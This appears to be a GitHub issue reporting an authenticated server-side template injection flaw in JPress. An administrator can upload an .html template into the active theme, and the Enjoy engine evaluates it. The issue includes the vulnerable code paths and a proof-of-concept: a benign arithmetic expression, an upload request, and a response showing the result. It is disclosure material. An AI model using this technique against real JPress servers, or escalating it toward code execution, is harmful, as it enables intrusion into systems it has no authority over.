Skip to content

[Vulnerability Report]Authenticated Template Upload Leads to Server-Side Template Injection in JPress #196

Description

@cxcsec

Summary

An authenticated administrator with template-management permission can upload an .html file into the active JPress theme directory. The uploaded file is subsequently processed by the JFinal Enjoy template engine, allowing server-side template expressions to be evaluated.

Details

The upload producer is located in:

jpress-web/src/main/java/io/jpress/web/admin/_TemplateController.java

Method:

_TemplateController.doUploadFile()

Relevant behavior:

File pathFile = new File(template.getAbsolutePathFile(), dirName);
FileUtils.copyFile(uploadFile.getFile(), new File(pathFile, fileName));

The uploaded file is written directly into the active theme directory. Files ending in .html are registered in the current template and the template cache is cleared.

The sink is located in:

jpress-core/src/main/java/io/jpress/web/render/TemplateRender.java

Relevant behavior:

template = getEngine().getTemplate(view);
template.render(data, baos);

Because the uploaded file is later loaded by the Enjoy template engine, template expressions inside the uploaded file are evaluated server-side.

This creates the following producer-consumer chain:

Authenticated template upload
->
Active theme directory
->
TemplateRender
->
Enjoy expression evaluation

The issue requires an authenticated user with permission to manage or upload theme templates. It is not an unauthenticated vulnerability.

PoC

Create a file named jpress-puc-add.html:

PUC_ADD_#(111+2)

Upload it:

POST /admin/template/doUploadFile?d=/&csrf_token=<valid_csrf_token> HTTP/1.1
Host: 192.168.235.128:8090
Cookie:
Content-Type: multipart/form-data

file=@jpress-puc-add.html

The server responds:

{"state":"ok"}

Then request:

GET /jpress-puc-add.html HTTP/1.1
Host: 192.168.235.128:8090

Observed response:

PUC_ADD_113

The input expression #(111+2) was evaluated by the server and rendered as 113.

Impact

An authenticated user with template-management privileges can inject server-side template expressions into the active JPress theme. Depending on the available Enjoy engine capabilities and application configuration, this may allow unauthorized access to server-side data or further server-side code execution.

The demonstrated impact is confirmed server-side template expression evaluation. Operating-system command execution was not used or confirmed in this PoC.

Activity

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Metadata

Metadata

Assignees

No one assigned

    Labels

    No labels
    No labels

    Projects

    No projects

      Milestone

      No milestone

      Relationships

      None yet

      Development

      No branches or pull requests

      Issue actions